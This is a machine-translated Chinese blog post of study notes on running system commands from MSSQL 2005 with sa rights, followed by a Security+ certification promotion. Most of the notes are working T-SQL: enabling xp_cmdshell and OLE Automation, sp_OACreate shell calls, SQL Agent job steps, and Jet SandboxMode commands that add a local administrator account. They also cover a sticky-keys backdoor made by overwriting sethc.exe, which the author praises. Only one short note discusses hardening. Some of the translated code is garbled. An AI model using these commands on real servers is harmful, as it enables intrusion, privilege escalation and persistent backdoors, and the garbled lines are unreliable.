Summary of "Safe Cow Learning Notes" MSsql2005 (Sa) Permissions Execution command

A xp_cmdshell

EXEC Master. xp_cmdshell ' ipconfig '

Open xp_cmdshell:

--to-allow advanced options to be changed.

EXEC sp_configure ' show advanced options ', 1

GO

--To update the currently configured value for advanced options.

RECONFIGURE

GO

--to enable the feature.

EXEC sp_configure ' xp_cmdshell ', 1

GO

--To update the currently configured value for this feature.

RECONFIGURE

GO

Two sp_OACreate

Create a Wscript.Shell object

Use master declare @o int exec sp_oacreate ' Wscript.Shell ', @o out exec sp_OAMethod @o, ' run ', null, ' cmd/c ' net user > C : \test.tmp '

Create a Scripting.FileSystemObject object

DECLARE @o int

exec sp_oacreate ' Scripting.FileSystemObject ', @o out

exec sp_OAMethod @o, ' copyfile ', null, ' C:\windows\explorer.exe ', ' c:\windows\system32\sethc.exe ';

DECLARE @oo int

exec sp_oacreate ' Scripting.FileSystemObject ', @oo out exec sp_OAMethod @oo, ' copyfile ', null, ' c:\windows\s Ystem32\sethc.exe ', ' c:\windows\system32\dllcache\sethc.exe ';

can use Utilman.exe instead of sethc.exe to achieve the same effect the backdoor is cool, huh?

Create a Shell.Application object

DECLARE @o int

exec sp_oacreate ' shell.application ', @o out

exec sp_OAMethod @o, ' ShellExecute ', null, ' cmd.exe ', ' cmd/c net user >c:\test.txt ', ' c:\windows\system32 ', ', 1;

Open OLE Automation procedures

sp_configure ' show advanced options ', 1;

GO

RECONFIGURE;

GO

sp_configure ' Ole Automation procedures ', 1;

GO

RECONFIGURE;

GO
Our strategy is to make the object a little bit.
Wscript.Shell can call the system kernel to run DOS basic commands
This component can be renamed to prevent compromise by modifying the registry.
Hkey_classes_root\wscript.shell\
and hkey_classes_root\wscript.shell.1\
Renamed to a different name, such as: to Wscript.shell_changename or wscript.shell.1_changename
This component can be called normally using this when you call it later.
Also change the CLSID value
hkey_classes_root\wscript.shell\clsid\ Value of the project
hkey_classes_root\wscript.shell.1\clsid\ Value of the project
With Wscript.Shell, Scripting.FileSystemObject, shell.application

Three JOB

With the job execution command, one of the prerequisites is to turn on the SQLServerAgent service, and the following statement can open
exec master.dbo.xp_servicecontrol ' start ', ' SQLServerAgent '
Use msdb CREATE TABLE [jncsql] (resulttxt nvarchar (1024x768) null) EXEC sp_delete_job null, ' x ' exec sp_add_job ' x ' exec
Sp_add_jobstep null, ' x ', null, ' 1 ', ' CmdExec ', ' cmd/c ' net user>c:\test.test ' exec sp_add_jobserver
NULL, ' x ', @ @servername exec sp_start_job ' x ';
Four SandboxMode (online often said sandbox mode)
Principle: Invoke the Shell function of VBS in Access and execute any command with system privileges. But before you try this function, you must open a switch called SandboxMode in the registration table,
Registration form: Hkey_local_machine\software\micris
Oft\jet\4.0\engine\sandboxmode. The default value is 2, and this person has a key value of 0 that starts
Finally disables SandboxMode mode, 1 means that for non-acess applications to try SandboxMode mode, 2 means to use SandboxMode mode for an Access application, and 3 to fully turn on security settings. 1 or 0 can execute commands
EXEC sp_addlinkedserver ' testsql ', ' OLE DB Provider for Jet ', ' microsoft.jet.oledb.4.0 ', ' c:\windows\system32\ias\ Ias.mdb '
EXEC master. Xp_regwrite ' HKEY_LOCAL_MACHINE ', ' Software\microsoft\jet\4.0\engines ', ' SandboxMode ', ' REG_DWORD ', 1
EXEC Master. Xp_regread HKEY_LOCAL_MACHINE, ' Software\microsoft\jet\4.0\engines ', ' SandboxMode '
SELECT * FROM OPENROWSET (' microsoft.jet.oledb.4.0 ', ';d atabase=c:\windows\system32\ias\ias.mdb ', ' Select Shell ' (" cmd.exe/c NET user Test Test/add ")
SELECT * FROM OPENROWSET (' Microsoft.Jet.OLEDB.4.0 ',
';d atabase=c:\windows\system32\ias\ias.mdb ', ' Select Shell ' ("cmd.exe/c net localgroup Administrators Test/add")
Here are the two MDB files that the system comes with
C:\WINDOWS\system32\ias\dnary.mdb
C:\WINDOWS\system32\ias\ias.mdb
Summarize
The above several methods (look carefully I have forgotten a few, haha. You can divergent thinking, and then find out several) are in the default test, often infiltration when there are many restrictions, we can overcome each, using components to get server information, read, create files and so on, we still have a deep understanding of the rights of the phrase AH.

Note
About *.exe c:\windows\system32\ and C:\Windows\System32\Dllcache.
About Cmd.exe and Command.exe.
About Net.exe and Net1.exe.
MDB file does not exist we can upload one.
The component that executes the command is not the only one OH

This note is for safe Cattle class student notes, want to see this course or information security of dry goods can go to safe cattle classes

security+ Certification Why is the Internet + era of the most popular certification?

Manifesto first introduce you to security+

security+ certification is a neutral third-party certification, the issuing agency for the United States Computer Industry Association CompTIA, and CISSP, ITIL and other common inclusion of the international IT Industry 10 Popular certification, and CISSP emphasis on information security management, compared to security+ Authentication is more emphasis on information security technology and operations.

This certification demonstrates your ability to network security, compliance and operational security, threats and vulnerabilities, application, data and Host security, access control and identity management, and encryption technology. Because of its difficult examination difficulty, the gold content is high, has been widely adopted by global enterprises and security professionals.

Why is security+ certification so hot?

        Reason one: In all information security certification, the emphasis on information security technology certification is blank,  security+ certification can make up for the gap in the field of information security technology.

      currently recognized in the industry of information security certification mainly Cisp and CISSP, but whether cisp or CISSP are emphasis on information security management, technical knowledge is broad and simple, the exam is around. And CISSP require a certificate of information security work experience for more than 5 years, Cisp also require a college education 4 years of working experience, these requirements will undoubtedly be able and motivated young people of the road blocked. In the real world, whether it is looking for a job or a raise, or a tender time to report personnel, certification is essential, which brings a lot of injustice to young people. The emergence of security+ can clear these young people career development obstacles, because security+ emphasis on information security technology, so there is no special requirements for work experience. As long as you have an IT-related background, the pursuit of progress can be studied and tested.

        reason two:  it operation and maintenance personnel work and turn over the weapon.

        in the banking, securities, insurance, information and communications industries, IT operations personnel are very many, it operations involved in the face is also very wide. is a network, system, security, application architecture, storage as one integrated technology post. Although no program ape "born as a Bachelor, Die also write code," The solemn and tragic, but also has "Hoe wo Day Copse, as the operation of suffering" feeling. Every day to the computer and machine, the time has been inevitable for career development confusion and confusion. The advent of security+ international certification allows the pursuit of IT operations personnel to learn network security knowledge, to master network security practices. Career development in the direction of network security, to solve the problem of the shortage of information security personnel in China. In addition, even if not transformation, to do a good job in operation and maintenance, learning safety knowledge to obtain safety certification is also essential.

Reason three: grounding gas, international stylish, easy to test, moderate cost!

As the most influential global leader in the global ICT sector, CompTIA is professional, fair and impartial in the field of information security talent certification. Security+ certification is highly operational and closely related to the daily work of frontline engineers. Suitable for banks, securities, insurance, internet companies and other IT-related personnel learning. As an international certification in 147 countries around the world are widely recognized.

Under the current tide of information security, talent is the key to the development of information security. and the current domestic information security personnel is very scarce, I believe security+ certification will become the most popular information security certification.

This article is from the "11662938" blog, please be sure to keep this source http://11672938.blog.51cto.com/11662938/1977868

Summary of "Safe Cow Learning Notes" MSsql2005 (Sa) Permissions Execution command